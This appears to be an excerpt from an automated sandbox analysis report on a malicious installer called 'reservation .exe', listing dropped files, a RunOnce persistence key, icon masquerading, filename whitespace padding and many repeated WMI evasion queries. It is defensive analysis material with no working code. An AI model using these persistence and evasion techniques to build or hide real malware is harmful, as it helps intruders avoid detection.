                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\libssl-1_1.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-RFQHO.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libeay32.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\msvcr120.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-BFIN6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-9MCCS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\astclient.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-SSL54.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-26KIS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\ast.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-PO10S.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libjpeg-turbo-win.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\aw_sas32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\quartz.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\libeay32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\msvcr120.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\ast.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\opus.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libssl-1_1.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\astrct.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-OUNKJ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-MGO66.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\reservation .exeFile created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fat

                          Hooking and other Techniques for Hiding and Protection

                          Source: initial sample; Icon embedded in binary file: icon matches a legit application icon: 111.png
                          Source: Detected 46 consecutive spaces in filename; Static PE information: reservation .exe
                          Source: C:\Users\user\Desktop\reservation .exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
